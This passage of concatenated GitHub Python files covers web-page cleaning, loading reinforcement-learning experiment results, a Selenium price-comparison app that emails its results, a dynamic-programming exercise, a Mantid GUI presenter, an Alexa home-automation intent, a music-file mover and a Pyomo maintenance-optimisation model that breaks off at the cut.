\"ibm-no-print\", \"metavalue\"])\n\tsoup = removeTag(soup, \"div\", \"id\", \n\t\t[\"dw-masthead-top-row\", \"ibm-masthead\", \"ibm-footer-module-dwwrapper\", \"ibm-footer\", \"ibm-metrics\"])\n\tsoup = removeTag(soup, \"ul\", \"class\", [\"ibm-portrait-module-list\"])\n\tsoup = removeTag(soup, \"ul\", \"id\", [\"ibm-navigation-trail\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", [\"ibm-alternate-rule ibm-no-print\"])\n\tsoup = removeTag(soup, \"p\", \"class\", [\"ibm-ind-link ibm-back-to-top\"])\n\treturn soup\n\ndef removeFreeBufTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t[\"panel panel-default\", \"commentshow\", \"comment-list\", \"panel panel-default rec-spe\"])\n\treturn soup\n\nif len(sys.argv) < 2:\n sys.stderr.write('Usage: clean [url] ')\n sys.exit(1)\n\nurl = sys.argv[1]\nhtmlDoc = getHtml(url)\nsoup = BeautifulSoup(htmlDoc, \"lxml\")\nsoup = removeScript(soup)\nif \"segmentfault.com\" in url:\n\tsoup = removeSegmentFaultTag(soup)\nelif \"jobbole.com\" in url:\n\tsoup = removeJobboleTag(soup)\nelif \"www.infoq.com/cn\" in url:\n\tsoup = removeInfoQCN(soup)\nelif \"iteblog\" in url:\n\tsoup = removeITEBlog(soup)\nelif \"www.ibm.com/developerworks\" in url:\n\tsoup = removeIBMTag(soup)\nelif \"www.freebuf.com\" in url:\n\tsoup = removeFreeBufTag(soup)\n\nhtml = soup.prettify(\"utf-8\")\n\nwith open(\"output.html\", \"wb\") as file:\n file.write(html)\n","repo_name":"HungMingWu/CleanerWebsite","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12016187860","text":"import os\nimport glob\nimport json\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom typing import List\nfrom training.utils.reader import DataReader, ModelTrainingData\n\n\ndef get_run_number(run_dir_path: str) -> int:\n return int(run_dir_path.split(\"_\")[-1])\n\n\ndef get_episode_reward(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.reward for step in episode_data])\n\n\ndef get_episode_passes(episode_data: List[ModelTrainingData]):\n return np.sum([step.env_data.n_balls_passed for step in episode_data])\n\n\ndef get_action_distribution(run_data_list: List[List[ModelTrainingData]]):\n total_samples = 0\n dist = np.zeros(run_data_list[0][0].model_output.action_space_size)\n for d in run_data_list:\n total_samples += len(d)\n for t_step in d:\n dist[t_step.model_output.role] += 1\n dist = dist/total_samples\n return dist\n\n\ndef total_times_over_runs(times: pd.DataFrame, key: str) -> pd.DataFrame:\n totals = pd.DataFrame()\n times = times.reset_index(drop=True)\n for i, pd_index in enumerate(times.index):\n totals = totals.append([times[key][:i].sum() + times[key][pd_index]], ignore_index=True)\n times[key + \" over runs\"] = totals\n return times\n\n\ndef get_time_spent_simulating_training_per_run(exp_data: pd.DataFrame):\n return total_times_over_runs(exp_data[\"simulated training data time per epoch\"])\n\n\ndef get_total_time_over_runs(exp_data: pd.DataFrame, key: str) -> pd.DataFrame:\n new_data = pd.DataFrame()\n for t_id in exp_data[\"turtle\"].unique():\n for name in exp_data[\"name\"].unique():\n set_with_comp_data = exp_data[(exp_data['name'] == name) & (exp_data['turtle'] == t_id)]\n set_with_comp_data = total_times_over_runs(set_with_comp_data, key)\n new_data = new_data.append(set_with_comp_data, ignore_index=True)\n return new_data\n\n\ndef get_run_turtle_data(data_dir_path: str, turtle_id: int) -> dict:\n run_data = []\n reader = DataReader()\n search_string = data_dir_path + \"/model_data*t\" + str(turtle_id) + \"*.mb\"\n files = glob.glob(search_string)\n if len(files) > 0:\n for index, file in enumerate(files):\n run_data.append(reader.read_data(file))\n action_distribution = get_action_distribution(run_data)\n\n return {\"mean epoch reward\": np.mean([get_episode_reward(episode) for episode in run_data]),\n \"quantile 1st epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch reward\": np.quantile([get_episode_reward(episode) for episode in run_data], 0.75),\n \"mean epoch passes\": np.mean([get_episode_passes(episode) for episode in run_data]),\n \"quantile 1st epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.25),\n \"quantile 3rd epoch passes\": np.quantile([get_episode_passes(episode) for episode in run_data], 0.75),\n \"action pass\": action_distribution[0],\n \"action receive\": action_distribution[1],\n \"action move\": action_distribution[2],\n \"action intercept\": action_distribution[3]}\n\n\ndef get_computation_time(run_dir_path: str) -> dict:\n file_path = os.path.join(run_dir_path,\n \"models/training/time_per_training_epoch.timepickle\")\n if os.path.exists(file_path):\n with open(file_path, \"rb\") as file:\n epoch_training_times = pickle.load(file)\n return {\"computation time\": np.sum([np.round(time.microseconds)/1e6 for time in epoch_training_times])}\n return {\"computation time\": 0}\n\n\ndef get_run_meta_data(run_dir_path: str) -> dict:\n with open(os.path.join(run_dir_path, \"config/config.json\"), 'r') as file:\n meta_data_file: dict = json.load(file)\n simulated_epoch_time_for_training = meta_data_file[\"inference\"][\"episodes\"] * meta_data_file[\"inference\"][\"episode_time\"]\n meta_data = {\"name\": meta_data_file[\"name\"],\n \"algorithm\": meta_data_file[\"algorithm\"],\n \"evaluation episodes per epoch\": meta_data_file[\"evaluation\"][\"episodes\"],\n \"evaluation time per episode\": meta_data_file[\"evaluation\"][\"episode_time\"],\n \"training data episodes per epoch\": meta_data_file[\"inference\"][\"episodes\"],\n \"training data time per episode\": meta_data_file[\"inference\"][\"episode_time\"],\n \"simulated training time\": simulated_epoch_time_for_training,\n \"simulated training frames\": round(simulated_epoch_time_for_training*100)}\n\n if meta_data_file[\"algorithm\"] == \"simple_pg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"simple_pg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"vpg\":\n meta_data[\"learning rate\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"policy_learning_rate\"]\n meta_data[\"network sizes\"] = meta_data_file[\"algorithm_settings\"][\"vpg\"][\"network_hidden_sizes\"]\n elif meta_data_file[\"algorithm\"] == \"rule_based\" or meta_data_file[\"algorithm\"] == \"uniform_sampling\":\n meta_data[\"learning rate\"] = None\n meta_data[\"network sizes\"] = None\n meta_data[\"training data time per episode\"] = 0\n meta_data[\"simulated training time\"] = 0\n return meta_data\n\n\ndef get_run_data(run_dir_path: str, turtle_id: int) -> dict:\n run_data_dict = {\"run\": get_run_number(run_dir_path),\n \"turtle\": turtle_id,\n \"training time\": None}\n run_data_dict.update(get_run_meta_data(run_dir_path))\n run_data_dict.update(get_run_turtle_data(os.path.join(run_dir_path, \"evaluation\"), turtle_id))\n run_data_dict.update(get_computation_time(run_dir_path))\n return run_data_dict\n\n\ndef get_experiment_data(experiment_dir_path: str) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n for t_id in [2, 3]:\n dirs = [d for d in os.listdir(experiment_dir_path)\n if os.path.isdir(os.path.join(experiment_dir_path, d))]\n for run_dir in dirs:\n if not run_dir == \"figures\":\n run_data = get_run_data(\n os.path.join(experiment_dir_path, run_dir), t_id)\n experiment_data = experiment_data.append(run_data, ignore_index=True)\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'computation time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training time')\n experiment_data = get_total_time_over_runs(\n experiment_data.sort_values(by=[\"name\", \"turtle\", \"run\"]), 'simulated training frames')\n experiment_data[\"training time\"] = experiment_data[\"computation time\"] \\\n + experiment_data[\"simulated training time\"]\n experiment_data[\"training time over runs\"] = experiment_data[\"computation time over runs\"] \\\n + experiment_data[\"simulated training time over runs\"]\n return experiment_data\n\n\ndef get_experiments_data(experiment_dir_paths: List[str]) -> pd.DataFrame:\n experiment_data = pd.DataFrame()\n for dir_path in experiment_dir_paths:\n experiment_data = experiment_data.append(get_experiment_data(dir_path))\n return experiment_data\n\n\nif __name__ == \"__main__\":\n test = get_experiment_data(\"/home/robocup/svn/trunk/src/Turtle2/Strategy/src/STP/strategy_learner/experiments/results/11-nov-spg-1\")\n print(test)\n","repo_name":"mickeybeurskens/strategy-learner","sub_path":"evaluation/load_experiments.py","file_name":"load_experiments.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9939402889","text":"######################################################\n# Imports\n######################################################\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport jellyfish\n\nfrom flask import Flask, render_template, request\nimport time\n\nimport yagmail\nimport os\n\n\nservice = Service('path') # path to chromedriver for local machine\n\n######################################################\n# web scraping functions\n######################################################\n\ndef clean_price_rtv(text):\n return float(text.split(\" zł\")[0].replace(' ', ''))\n\ndef clean_price_media(text):\n return float(text.replace('\\u202f', ''))\n\n# function below extracts the minimum price from prices lower than maximum price stated in the GUI\n# the similarity ratio of offers and searched product has to be bigger than minimum ratio\n# we are taking into account two highest ratios to avoid rejecting similar item (e.g. just different color) with lower price\n\ndef get_min_price(ratio_list, price_list, threshold, ratio_min):\n if len(ratio_list) > 0 and len(price_list) > 0:\n help_index = [index for index, item in enumerate(price_list) if item <= threshold]\n if help_index != []:\n index = [index for index, item in enumerate(ratio_list) if item >= sorted(ratio_list)[-2] and item > ratio_min and index in help_index]\n min_price = min([price_list[i] for i in index])\n return min_price\n\ndef get_driver(url):\n options = webdriver.ChromeOptions()\n options.add_argument(\"disable-infobars\")\n options.add_argument(\"start-maximized\")\n options.add_argument(\"disable-dev-shm-usage\")\n options.add_argument(\"no-sandbox\")\n options.add_argument(\"--headless=new\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_argument(\"disable-blink-features=AutomationControlled\")\n\n driver = webdriver.Chrome(service=service, options=options)\n driver.get(url)\n return driver\n\n\ndef rtv_get_results(text, url, threshold):\n driver = get_driver(url)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/ems-root/eui-root/eui-dropdown-host/div[2]/ems-euro-mobile/ems-euro-mobile-shared-feature-header-wrapper/ems-euro-mobile-shared-feature-header/div/ems-header/div[2]/div/div/div[2]/ems-euro-mobile-shared-feature-search-container/div/div/ems-search-input/ems-text-input/label/div/div/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box-medium__link')\n WebDriverWait(driver, 10).until(EC.presence_of_element_located(expected))\n offers = driver.find_elements(By.CLASS_NAME, \"box-medium__link\")\n prices = driver.find_elements(By.CLASS_NAME, \"price__value\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n link_list.append(offer.get_attribute('href'))\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_rtv(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n\ndef media_get_results(text, url, threshold):\n driver = get_driver(url)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/div[1]/div[2]/header[2]/div[2]/div/div/div[2]/div/form/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box')\n WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located(expected))\n time.sleep(2)\n\n offers = driver.find_elements(By.CLASS_NAME, \"box\")\n links = driver.find_elements(By.CSS_SELECTOR, \"h2.name.is-section>a\")\n prices = driver.find_elements(By.CLASS_NAME, \"whole\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n for link in links:\n link_list.append(link.get_attribute(\"href\"))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_media(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n######################################################\n# email sending functions\n######################################################\n\n\ndef results_to_html_list(webpage, input):\n if type(input) != str:\n my_string = \"\"\"
      • Web store: {0}
        \n Offer: {1}
        \n Price: {2}
        \n Link: {3}
      • \n \"\"\".format(webpage, input[0], input[1], input[2])\n return my_string\n else:\n my_string = \"\"\"
      • Web store: {0}
        \n Offer: No results to show
      • \"\"\".format(webpage)\n return my_string\n\n\ndef send_email(sender, receiver, subject, results_list):\n\n email_list = []\n\n for result in results_list:\n email_list.append(results_to_html_list(result[0], result[1]))\n\n contents = \"\"\"\n

        Hi!
        \n Below please find the results of your search:

        \n
          \n {0}\n
        \n

        KR,
        \n Your Python code

        \n \"\"\".format('
        '.join(email_list))\n\n yag = yagmail.SMTP(user=sender, password=os.getenv('secret_key'))\n yag.send(to=receiver, subject=subject, contents=contents)\n\n\n######################################################\n# Flask app\n######################################################\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('./index.html',\n status=\" hidden\",\n results_rtv=(str(), str(), str()),\n results_media=(str(), str(), str()),)\n\n\n@app.route('/', methods=['POST'])\ndef home_post():\n\n price = float(request.form['price-name'])\n email = str(request.form['email-name'])\n product = str(request.form['product-name'])\n\n results_rtv = rtv_get_results(product, \"https://www.euro.com.pl/\", price)\n results_media = media_get_results(product, \"https://www.mediaexpert.pl/\", price)\n\n if type(results_rtv) == str and type(results_media) == str:\n final_text = \"No results to send via email.\"\n else:\n final_text = \"The results were also sent to the provided email.\"\n results_list = [[\"RTV EURO AGD\", results_rtv], [\"Media Expert\", results_media]]\n send_email('sender email', email, \"RTV product finder results\", results_list)\n\n if type(results_rtv) == str:\n results_rtv = (results_rtv, str(), str())\n\n if type(results_media) == str:\n results_media = (results_media, str(), str())\n\n return render_template('index.html',\n status=\" \",\n price_max=price,\n product=product,\n email=email,\n final_text=final_text,\n results_rtv=results_rtv,\n results_media=results_media)\n\n\napp.run(host='0.0.0.0')\n","repo_name":"kp-muszynski/RTV-web-scraping","sub_path":"web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12006893918","text":"# dp[1] = 1\n# dp[2] = 2: 2번 카드 1개, 1번 카드 2개를 쓰는 것 중 큰 수 이다.\n# dp[3] = 3: 3번 카드 1개, 1과 dp[2]를 쓰는 것 중 큰 수이다. 여기서 1,1,1로 3을 만드는 경우, 1,2로 3을 만드는 경우는 dp[2]에서 처리가 끝난 것\n# dp[n] = n: n번 카드 1개 or 1과 dp[n-1] or dp[2]와 dp[n-2], ..dp[i]와 dp[n-i] 중 max\n\nn = int(input())\nprices = list(map(int, input().split()))\nprices.insert(0, 0)\n\ndp = [0] * (n+1)\ndp[0] = 0\ndp[1] = prices[1]\ndp[2] = max(prices[2], dp[1] + prices[1])\n\nfor i in range(3, n+1):\n dp[i] = prices[i]\n for j in range(1, i):\n dp[i] = max(dp[i], dp[j] + dp[i-j])\n\nprint(dp[-1])\n","repo_name":"plibi/codingtest","sub_path":"BOJ/11052.py","file_name":"11052.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7712322366","text":"from mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_model import DeadTimeCorrectionsModel\nfrom mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_view import DeadTimeCorrectionsView\nfrom mantidqtinterfaces.Muon.GUI.Common.utilities.load_utils import get_table_workspace_names_from_ADS, load_dead_time_from_filename\n\n\nclass DeadTimeCorrectionsPresenter:\n \"\"\"\n The DeadTimeCorrectionsPresenter has a DeadTimeCorrectionsView and DeadTimeCorrectionsModel.\n \"\"\"\n\n def __init__(self, view: DeadTimeCorrectionsView, model: DeadTimeCorrectionsModel, corrections_presenter):\n \"\"\"Initialize the DeadTimeCorrectionsPresenter. Sets up the slots and event observers.\"\"\"\n self.view = view\n self.model = model\n self._corrections_presenter = corrections_presenter\n\n self.view.set_slot_for_dead_time_from_selector_changed(self.handle_dead_time_from_selector_changed)\n self.view.set_slot_for_dead_time_workspace_selector_changed(self.handle_dead_time_workspace_selector_changed)\n self.view.set_slot_for_dead_time_file_browse_clicked(self.handle_dead_time_browse_clicked)\n\n def initialize_model_options(self) -> None:\n \"\"\"Initialise the model with the default fitting options.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n\n def handle_ads_clear_or_remove_workspace_event(self, _: str = None) -> None:\n \"\"\"Handle when there is a clear or remove workspace event in the ADS.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.view.set_dead_time_from_data_file_selected()\n elif self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_from_workspace_selected()\n\n def handle_instrument_changed(self) -> None:\n \"\"\"User changes the selected instrument.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_run_selector_changed(self) -> None:\n \"\"\"Handles when the run selector is changed.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.model.set_dead_time_source_to_from_file()\n self.update_dead_time_info_text_in_view()\n\n def handle_dead_time_from_selector_changed(self) -> None:\n \"\"\"Handles when the location where the dead time should be retrieved from changes.\"\"\"\n if self.view.is_dead_time_from_data_file_selected():\n self._handle_dead_time_from_data_file_selected()\n self._set_dead_time_widgets_visible(False, False)\n elif self.view.is_dead_time_from_workspace_selected():\n self._handle_dead_time_from_workspace_selected()\n self._set_dead_time_widgets_visible(True, False)\n elif self.view.is_dead_time_from_other_file_selected():\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, True)\n else:\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, False)\n\n def _handle_dead_time_from_data_file_selected(self) -> None:\n \"\"\"Handles when the dead time from data file is initially selected.\"\"\"\n self.set_dead_time_source_to_from_file()\n\n def _handle_dead_time_from_workspace_selected(self) -> None:\n \"\"\"Handles when the dead time from workspace is initially selected.\"\"\"\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n self.set_dead_time_source_to_from_ads()\n\n def _handle_dead_time_from_none_selected(self) -> None:\n \"\"\"Handles when the dead time is none is initially selected.\"\"\"\n self.set_dead_time_source_to_none()\n\n def handle_dead_time_workspace_selector_changed(self) -> None:\n \"\"\"The user changes the selected Table Workspace to use as dead time.\"\"\"\n table_name = self.view.selected_dead_time_workspace()\n if table_name == \"None\" or table_name == \"\":\n self._handle_dead_time_from_none_selected()\n else:\n error = self.model.validate_selected_dead_time_workspace(table_name)\n if error == \"\":\n self.set_dead_time_source_to_from_ads()\n else:\n self.view.set_selected_dead_time_workspace(\"None\")\n self._handle_selected_table_is_invalid()\n self._corrections_presenter.warning_popup(error)\n\n def _handle_selected_table_is_invalid(self) -> None:\n \"\"\"Handles when the selected dead time table workspace is invalid.\"\"\"\n # Triggers handle_dead_time_from_selector_changed\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_dead_time_browse_clicked(self) -> None:\n \"\"\"User selects the option to Browse for a nexus file to load dead times from.\"\"\"\n filename = self.view.show_file_browser_and_return_selection([\"nxs\"], [\"\"], multiple_files=False)[0]\n if filename != \"\":\n name = self._load_file_containing_dead_time(filename)\n if name is not None:\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n error = self.model.validate_selected_dead_time_workspace(name)\n if error == \"\":\n self.view.switch_to_using_a_dead_time_table_workspace(name)\n else:\n self._corrections_presenter.warning_popup(error)\n\n def handle_pre_process_and_counts_calculated(self) -> None:\n \"\"\"Handles when MuonPreProcess and counts workspaces have been calculated.\"\"\"\n self.update_dead_time_info_text_in_view()\n\n def update_dead_time_info_text_in_view(self) -> None:\n \"\"\"Update the dead time info label in the view.\"\"\"\n if self.model.is_dead_time_source_from_data_file() or self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_average_and_range(\n self._corrections_presenter.current_run_string(), self.model.dead_times_range(), self.model.dead_times_average()\n )\n else:\n self.view.set_dead_time_info_text(\"No dead time correction\")\n\n def set_dead_time_source_to_from_file(self) -> None:\n \"\"\"Sets the dead time source to be from the data file and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_from_ads(self) -> None:\n \"\"\"Sets the dead time source to be the ADS and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_ads(self.view.selected_dead_time_workspace())\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_none(self) -> None:\n \"\"\"Sets the dead time source to be none and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_none()\n self._notify_perform_dead_time_corrections()\n\n def _set_dead_time_widgets_visible(self, workspace_mode_visible: bool, other_file_mode_visible: bool) -> None:\n \"\"\"Sets which dead time widgets are visible.\"\"\"\n self.view.set_dead_time_workspace_selector_visible(workspace_mode_visible)\n self.view.set_dead_time_other_file_visible(other_file_mode_visible)\n\n def _load_file_containing_dead_time(self, filename: str) -> str:\n \"\"\"Attempts to load a Nexus cycle file containing a dead time table workspace.\"\"\"\n try:\n name = load_dead_time_from_filename(filename)\n except Exception:\n self._corrections_presenter.warning_popup(\n \"The file provided has an unexpected format. The file should be \" \"of the same instrument and cycle as the raw data.\"\n )\n return None\n\n if name == \"\":\n self._corrections_presenter.warning_popup(\"The file provided does not contain dead time data.\")\n return None\n return name\n\n def _notify_perform_dead_time_corrections(self) -> None:\n \"\"\"A notification event to trigger the calculation of the dead time corrections.\"\"\"\n self._corrections_presenter.disable_editing_notifier.notify_subscribers()\n self._corrections_presenter.perform_corrections_notifier.notify_subscribers()\n self._corrections_presenter.enable_editing_notifier.notify_subscribers()\n","repo_name":"mantidproject/mantid","sub_path":"qt/python/mantidqtinterfaces/mantidqtinterfaces/Muon/GUI/Common/corrections_tab_widget/dead_time_corrections_presenter.py","file_name":"dead_time_corrections_presenter.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"39"} +{"seq_id":"11735922080","text":"import appdaemon.plugins.hass.hassapi as hass\nimport random\n\nclass woIsSomeoneIntent(hass.Hass):\n\n def initialize(self):\n return\n\n def getIntentResponse(self, slots, devicename):\n try:\n ############################################\n # an example Intent to show how you can change text\n # based on sensor states or time\n ############################################\n if self.slots[\"person\"] in self.args[\"household\"]:\n ############################################\n # decide if a person is guest or not\n ############################################\n if self.get_state(\"sensor.\" + self.slots[\"person\"]) == \"In bed\":\n ############################################\n # assumes that there are sensors for every person \n # with a state if thet are in Bed\n ############################################\n text = self.random_arg(self.args[\"inBed\"])\n elif self.get_state(\"sensor.kellertime\") == \"ja\":\n ############################################\n # assumes that there is a sensor thats set to \"ja\"\n # for a certain event\n ############################################\n text = self.random_arg(self.args[\"kellerTime\"])\n elif self.now_is_between(\"18:00:00\",\"18:30:00\"):\n ############################################\n # at dinertime give another text\n ############################################\n text = self.random_arg(self.args[\"diner\"])\n elif self.slots[\"person\"] == \"olinde\":\n if self.now_is_between(\"16:00:00\",\"17:30:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"couch\"])\n elif self.now_is_between(\"17:30:00\",\"18:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"cooking\"])\n else:\n text = self.random_arg(self.args[\"Olinde\"][\"somethingElse\"])\n elif self.slots[\"person\"] == \"rene\":\n if self.now_is_between(\"19:00:00\",\"20:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Rene\"][\"couch\"])\n else:\n text = self.random_arg(self.args[\"Rene\"][\"somethingElse\"])\n else:\n text = self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n else:\n text = self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n except: \n text = self.args[\"Error\"]\n return text\n\n def random_arg(self,argName):\n ############################################\n # pick a random text from a list\n ############################################\n if isinstance(argName,list):\n text = random.choice(argName)\n else:\n text = argname\n return text\n","repo_name":"ReneTode/Alexa-Appdaemon-App","sub_path":"apps/internet/alexa/example_intents/woIsSomeone/woIsSomeoneIntent.py","file_name":"woIsSomeoneIntent.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"de","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"16667754697","text":"# -*- coding: utf-8 -*-\n# 用于将各专辑文件夹下的歌曲文件搬到同一个文件夹里边, 使用前请把 neteaseMusicPath 改成自己电脑上的路径\n# 特别注意路径末尾的 \\\\\n# zhian.h@qq.com\n# python flat_music.py\n\nimport io\nimport os\nimport sys\nimport shutil\n\nsys.stdout = io.TextIOWrapper(\n sys.stdout.buffer, encoding='utf-8') # 改变标准输出的默认编码\n\nneteaseMusicPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\Music\\\\\"\noutputPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\output\\\\\"\n\n\ndef stealFile(path, outputPath):\n for roots, dirs, files in os.walk(path):\n for file in files:\n try:\n shutil.move(os.path.join(roots, file), outputPath)\n print(os.path.join(roots, file))\n except Exception as e:\n print(e)\n pass\n for dir in dirs:\n stealFile(dir, outputPath)\n\n\nif __name__ == '__main__':\n stealFile(neteaseMusicPath, outputPath)\n","repo_name":"jaan-hou/NeteaseCloudMusic-tools","sub_path":"flat_music.py","file_name":"flat_music.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34489179630","text":"from pyomo.environ import *\nimport numpy as np\n\nmodel = ConcreteModel()\nTT = 5#5\nmodel.T = RangeSet(0, TT-1) # time periods\n\n# i0 = 5.0 # initial inventory\n# c = 4.6 # setup cost\n# h_pos = 0.7 # inventory holding cost\n# h_neg = 1.2 # shortage cost\n# P = 5.0 # maximum production amount\n# # demand during period t\n# d = {1: 5.0, 2:7.0, 3:6.2, 4:3.1, 5:1.7}\n\nn_condition = 3\nn_operation = 3\nmodel.n_condition = RangeSet(0, n_condition-1)\nmodel.n_operation = RangeSet(0, n_operation-1)\n\n\nN = 1000\n\ns0 = [0.25, 0.7, 0.05]\n\ncon1_m_performance = np.asarray([[1, 0, 0], [1, 0, 0], [0.99, 0.01, 0]])\ncon2_m_performance = np.asarray([[0, 1, 0], [0.5, 0.5, 0], [0.99, 0.01, 0]])\ncon3_m_performance = np.asarray([[0, 0, 1], [0.1, 0.3, 0.6], [0.99, 0.01, 0]])\ncon_m_performance = np.zeros([n_condition, n_operation, n_condition])\ncon_m_performance[0, :] = con1_m_performance\ncon_m_performance[1, :] = con2_m_performance\ncon_m_performance[2, :] = con3_m_performance\n\ndegradeP = np.asarray([[0.7, 0.3, 0], [0, 0.8, 0.2], [0, 0, 1]])\nmaintenance_cost = np.asarray([[0, 0, 0], [30, 50, 100], [500, 500, 1000]])\n\n# define the variables\n#model.y = Var(model.T, domain=Binary)\n#model.x = Var(model.T, domain=NonNegativeReals)\nmodel.x = Var(RangeSet(TT), RangeSet(n_condition * (n_operation - 1)), initialize=0.6, bounds=(0, 1)) #action\n#model.x = Set(initialize=1.01*np.zeros([model.T, (n_condition * (n_operation - 1))]), domain=NonNegativeReals, bounds = (0, 1), ordered = True) #action\nmodel.u = Var(RangeSet(TT),RangeSet(n_condition * n_operation), initialize = 0, within=NonNegativeReals) #action\n#model.s = Var(RangeSet(TT), RangeSet(n_condition), domain=NonNegativeReals) #state\nmodel.costi = Var(RangeSet(TT), initialize=0, domain=NonNegativeReals) #cost\nmodel.ii = Var(RangeSet(TT), RangeSet(n_condition), initialize = 0, domain=NonNegativeReals)\nmodel.iii = Var(RangeSet(TT), initialize = 0, domain=NonNegativeReals)\n#model.aa = Var(RangeSet(1), domain=NonNegativeReals)\n\n\nuu = np.zeros(TT * n_operation * n_condition)\nss0 = np.zeros([TT + 1, n_condition])\nss0[0, :] = s0\n\n#constraint\ndef time_action(m, t):\n #print(t)\n for tj in m.n_condition:\n #print(tj)\n aa = 0\n for tk in m.n_operation:\n #print(tk)\n if tk == 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 1])\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 